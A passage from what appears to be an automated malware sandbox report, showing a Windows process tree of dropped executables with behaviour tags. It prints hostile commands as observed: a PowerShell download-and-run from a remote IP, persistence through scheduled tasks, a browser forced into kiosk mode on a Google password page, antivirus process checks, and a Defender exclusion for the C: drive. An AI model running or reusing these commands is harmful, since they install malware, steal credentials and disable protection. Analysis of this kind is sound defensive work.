                                                                                                                                                          extrac32 /Y /E Funky.wbk
                                                                                                                                                          10⤵
                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                          PID:5388
                                                                                                                                                        • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                          findstr /V "Und" Tournament
                                                                                                                                                          10⤵
                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                          PID:4716
                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                          cmd /c copy /b 674187\Constraints.com + Lu + Pepper + Cn + Hairy + Nose + Providence + Bra + Corresponding + Promo + Ending 674187\Constraints.com
                                                                                                                                                          10⤵
                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                          PID:2244
                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                          cmd /c copy /b ..\Losses.wbk + ..\Finally.wbk + ..\Medications.wbk + ..\Borough.wbk + ..\Trim.wbk + ..\Ellis.wbk + ..\Truly.wbk + ..\Was.wbk r
                                                                                                                                                          10⤵
                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                          PID:2176
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\674187\Constraints.com
                                                                                                                                                          Constraints.com r
                                                                                                                                                          10⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                                                                                          • Suspicious use of SendNotifyMessage
                                                                                                                                                          PID:5564
                                                                                                                                                        • C:\Windows\SysWOW64\choice.exe
                                                                                                                                                          choice /d y /t 5
                                                                                                                                                          10⤵
                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                          PID:5560
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\10047850101\crypted.exe
                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\10047850101\crypted.exe"
                                                                                                                                                      8⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                      PID:2104
                                                                                                                                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                                        9⤵
                                                                                                                                                          PID:512
                                                                                                                                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                                          9⤵
                                                                                                                                                            PID:5948
                                                                                                                                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                                            9⤵
                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                            PID:3028
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\10050360101\Amadey.exe
                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\10050360101\Amadey.exe"
                                                                                                                                                          8⤵
                                                                                                                                                          • Checks computer location settings
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          • Drops file in Windows directory
                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                          PID:5244
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\dbf9c9b26f\tgvazx.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\dbf9c9b26f\tgvazx.exe"
                                                                                                                                                            9⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                            PID:2888
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\10051520101\dc6b7a79b8.exe
                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\10051520101\dc6b7a79b8.exe"
                                                                                                                                                          8⤵
                                                                                                                                                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                          • Checks BIOS information in registry
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          • Identifies Wine through registry keys
                                                                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                          PID:4900
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\10051520101\dc6b7a79b8.exe"
                                                                                                                                                            9⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                            PID:5092
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\10051530101\522e881ea4.exe
                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\10051530101\522e881ea4.exe"
                                                                                                                                                          8⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                                          PID:5628
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\10051530101\522e881ea4.exe"
                                                                                                                                                            9⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            PID:3404
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\10451860101\trOUuPI.exe
                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\10451860101\trOUuPI.exe"
                                                                                                                                                      6⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                      PID:5320
                                                                                                                                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                                        7⤵
                                                                                                                                                          PID:1152
                                                                                                                                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                                          7⤵
                                                                                                                                                            PID:2216
                                                                                                                                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                                            7⤵
                                                                                                                                                              PID:3904
                                                                                                                                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                                              7⤵
                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                              PID:5332
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\10453070101\UU0LfLZ.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\10453070101\UU0LfLZ.exe"
                                                                                                                                                            6⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                            PID:812
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\10453880101\e2bf8bc9ca.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\10453880101\e2bf8bc9ca.exe"
                                                                                                                                                            6⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                                                                                            • Suspicious use of SendNotifyMessage
                                                                                                                                                            PID:2612
                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              C:\Windows\system32\cmd.exe /c schtasks /create /tn xrsk9ma5XTJ /tr "mshta C:\Users\Admin\AppData\Local\Temp\mYd5F82Ba.hta" /sc minute /mo 25 /ru "Admin" /f
                                                                                                                                                              7⤵
                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                              PID:2644
                                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                schtasks /create /tn xrsk9ma5XTJ /tr "mshta C:\Users\Admin\AppData\Local\Temp\mYd5F82Ba.hta" /sc minute /mo 25 /ru "Admin" /f
                                                                                                                                                                8⤵
                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                PID:3804
                                                                                                                                                            • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                              mshta C:\Users\Admin\AppData\Local\Temp\mYd5F82Ba.hta
                                                                                                                                                              7⤵
                                                                                                                                                              • Checks computer location settings
                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                              PID:4104
                                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'SUEV9JCXILJMGKFVKDH5JEUYLPMFSTIH.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                                                                                                                                                8⤵
                                                                                                                                                                • Blocklisted process makes network request
                                                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                                                • Downloads MZ/PE file
                                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                PID:1496
                                                                                                                                                                • C:\Users\Admin\AppData\Local\TempSUEV9JCXILJMGKFVKDH5JEUYLPMFSTIH.EXE
                                                                                                                                                                  "C:\Users\Admin\AppData\Local\TempSUEV9JCXILJMGKFVKDH5JEUYLPMFSTIH.EXE"
                                                                                                                                                                  9⤵
                                                                                                                                                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                                  • Checks BIOS information in registry
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  • Identifies Wine through registry keys
                                                                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                  PID:2068
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\10453890101\c3842a84fc.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\10453890101\c3842a84fc.exe"
                                                                                                                                                            6⤵
                                                                                                                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                            • Checks BIOS information in registry
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            • Identifies Wine through registry keys
                                                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                            PID:4776
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\10453900101\b07dfdddb1.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\10453900101\b07dfdddb1.exe"
                                                                                                                                                            6⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                            PID:672
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\10453900101\b07dfdddb1.exe"
                                                                                                                                                              7⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                                              PID:3356
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\10453910101\3d6c756052.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\10453910101\3d6c756052.exe"
                                                                                                                                                            6⤵
                                                                                                                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                            • Checks BIOS information in registry
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            • Identifies Wine through registry keys
                                                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                            PID:5148
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\10453910101\3d6c756052.exe"
                                                                                                                                                              7⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              PID:1980
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\10453920101\4c8c26e4ba.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\10453920101\4c8c26e4ba.exe"
                                                                                                                                                            6⤵
                                                                                                                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                            • Checks BIOS information in registry
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            • Identifies Wine through registry keys
                                                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                                            PID:1540
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\10453930101\4f64c61f7f.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\10453930101\4f64c61f7f.exe"
                                                                                                                                                            6⤵
                                                                                                                                                            • Checks BIOS information in registry
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            PID:5432
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\10453940101\3ee385dc43.exe
                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\10453940101\3ee385dc43.exe"
                                                                                                                                                            6⤵
                                                                                                                                                              PID:5148
                                                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                taskkill /F /IM firefox.exe /T
                                                                                                                                                                7⤵
                                                                                                                                                                • Kills process with taskkill
                                                                                                                                                                PID:5752
                                                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                taskkill /F /IM chrome.exe /T
                                                                                                                                                                7⤵
                                                                                                                                                                • Kills process with taskkill
                                                                                                                                                                PID:4724
                                                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                taskkill /F /IM msedge.exe /T
                                                                                                                                                                7⤵
                                                                                                                                                                • Kills process with taskkill
                                                                                                                                                                PID:4480
                                                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                taskkill /F /IM opera.exe /T
                                                                                                                                                                7⤵
                                                                                                                                                                • Kills process with taskkill
                                                                                                                                                                PID:2076
                                                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                taskkill /F /IM brave.exe /T
                                                                                                                                                                7⤵
                                                                                                                                                                • Kills process with taskkill
                                                                                                                                                                PID:2712
                                                                                                                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                                                                                                                                                                7⤵
                                                                                                                                                                  PID:2860
                                                                                                                                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                                                                                                                                                                    8⤵
                                                                                                                                                                      PID:2344
                                                                                                                                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 1980 -prefsLen 27099 -prefMapHandle 1984 -prefMapSize 270279 -ipcHandle 2068 -initialChannelId {ffadd431-dd05-47fb-a9d2-420bdbf45f40} -parentPid 2344 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2344" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu
                                                                                                                                                                        9⤵
                                                                                                                                                                          PID:3524
                                                                                                                                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2460 -prefsLen 27135 -prefMapHandle 2464 -prefMapSize 270279 -ipcHandle 2472 -initialChannelId {fc33091e-6cab-4fd6-b80a-5e8066fb273e} -parentPid 2344 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2344" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket
                                                                                                                                                                          9⤵
                                                                                                                                                                            PID:2452
                                                                                                                                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3744 -prefsLen 25213 -prefMapHandle 3748 -prefMapSize 270279 -jsInitHandle 3752 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3776 -initialChannelId {988acf17-8d70-4535-ab25-5efebee60d89} -parentPid 2344 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2344" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab
                                                                                                                                                                            9⤵
                                                                                                                                                                              PID:3580
                                                                                                                                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 3972 -prefsLen 27325 -prefMapHandle 3976 -prefMapSize 270279 -ipcHandle 4056 -initialChannelId {21004732-d897-4562-bd77-367156926dcd} -parentPid 2344 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2344" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd
                                                                                                                                                                              9⤵
                                                                                                                                                                                PID:4112
                                                                                                                                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 2756 -prefsLen 34824 -prefMapHandle 2720 -prefMapSize 270279 -jsInitHandle 2944 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3140 -initialChannelId {b136a252-c09c-41c7-91b6-737407c3054d} -parentPid 2344 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2344" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab
                                                                                                                                                                                9⤵
                                                                                                                                                                                  PID:3904
                                                                                                                                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 5056 -prefsLen 35012 -prefMapHandle 5060 -prefMapSize 270279 -ipcHandle 5068 -initialChannelId {054c21d5-d155-4141-8b73-3b94198eb89f} -parentPid 2344 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2344" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility
                                                                                                                                                                                  9⤵
                                                                                                                                                                                    PID:7072
                                                                                                                                                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5428 -prefsLen 32952 -prefMapHandle 5432 -prefMapSize 270279 -jsInitHandle 5436 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5408 -initialChannelId {383a8961-9438-4ebe-8697-fa32b228f060} -parentPid 2344 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2344" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab
                                                                                                                                                                                    9⤵
                                                                                                                                                                                      PID:6764
                                                                                                                                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5608 -prefsLen 32952 -prefMapHandle 5612 -prefMapSize 270279 -jsInitHandle 5616 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5624 -initialChannelId {d0965a97-faea-4c65-b5f1-985f7904cde1} -parentPid 2344 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2344" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab
                                                                                                                                                                                      9⤵
                                                                                                                                                                                        PID:6656
                                                                                                                                                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5796 -prefsLen 32952 -prefMapHandle 5800 -prefMapSize 270279 -jsInitHandle 5804 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5812 -initialChannelId {b426f155-d647-4ecc-b0c2-5d5085ffec67} -parentPid 2344 -crashReporter "\\.\pipe\gecko-crash-server-pipe.2344" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab
                                                                                                                                                                                        9⤵
                                                                                                                                                                                          PID:6636
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\10453950101\e69cb3d1b7.exe
                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\10453950101\e69cb3d1b7.exe"
                                                                                                                                                                                    6⤵
                                                                                                                                                                                      PID:4672
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\10453960101\Mbxp0H9.exe
                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\10453960101\Mbxp0H9.exe"
                                                                                                                                                                                      6⤵
                                                                                                                                                                                        PID:6984
                                                                                                                                                                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                                                                          7⤵
                                                                                                                                                                                            PID:6816
                                                                                                                                                                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                                                                            7⤵
                                                                                                                                                                                              PID:6796
                                                                                                                                                                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                                                                              7⤵
                                                                                                                                                                                                PID:6784
                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\wDwedsI0UY.exe
                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\wDwedsI0UY.exe"
                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                    PID:6608
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\wDwedsI0UY.exe
                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\wDwedsI0UY.exe" h
                                                                                                                                                                                                      9⤵
                                                                                                                                                                                                        PID:3900
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\BpeXE3Pl9A.exe
                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\BpeXE3Pl9A.exe"
                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                        PID:6836
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\10453970101\but2.exe
                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\10453970101\but2.exe"
                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                      PID:6972
                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                        "schtasks" /create /tn "PCI Bus Driver" /tr C:\Drivers\pcidrv.exe /sc minute /mo 1 /f
                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                        PID:6508
                                                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                        "schtasks" /create /tn "PCI Bus Driver Startup" /tr C:\Drivers\pcidrv.exe /sc onstart /ru SYSTEM /f
                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                        • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                                                        PID:6016
                                                                                                                                                                                                      • C:\Drivers\pcidrv.exe
                                                                                                                                                                                                        C:\Drivers\pcidrv.exe
                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                          PID:4776
                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                          "cmd" /C timeout /t 2 && del C:\Users\Admin\AppData\Local\Temp\10453970101\but2.exe
                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                            PID:3432
                                                                                                                                                                                                            • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                                                              timeout /t 2
                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                              • Delays execution with timeout.exe
                                                                                                                                                                                                              PID:672
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\10453980101\851bde5a27.exe
                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\10453980101\851bde5a27.exe"
                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                            PID:1856
                                                                                                                                                                                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                PID:1764
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\10453990101\larBxd7.exe
                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\10453990101\larBxd7.exe"
                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                PID:5016
                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c copy Cattle.psd Cattle.psd.bat & Cattle.psd.bat
                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                    PID:5872
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                                                                      tasklist
                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                      • Enumerates processes with tasklist
                                                                                                                                                                                                                      PID:12396
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                      findstr /I "opssvc wrsa"
                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                        PID:12404
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                                                                        tasklist
                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                        • Enumerates processes with tasklist
                                                                                                                                                                                                                        PID:10140
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                        findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                          PID:10088
                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\10454000101\Rm3cVPI.exe
                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\10454000101\Rm3cVPI.exe"
                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                        PID:15796
                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\10454010101\qhjMWht.exe
                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\10454010101\qhjMWht.exe"
                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                          PID:19024
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\10454020101\9sWdA2p.exe
                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\10454020101\9sWdA2p.exe"
                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                            PID:31572
                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\10454030101\TbV75ZR.exe
                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\10454030101\TbV75ZR.exe"
                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                              PID:36684
                                                                                                                                                                                                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                                                                                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                  PID:31672
                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\10454040101\UZPt0hR.exe
                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\10454040101\UZPt0hR.exe"
                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                  PID:37464
                                                                                                                                                                                                                                  • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                                                    cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'
                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                      PID:36780
                                                                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
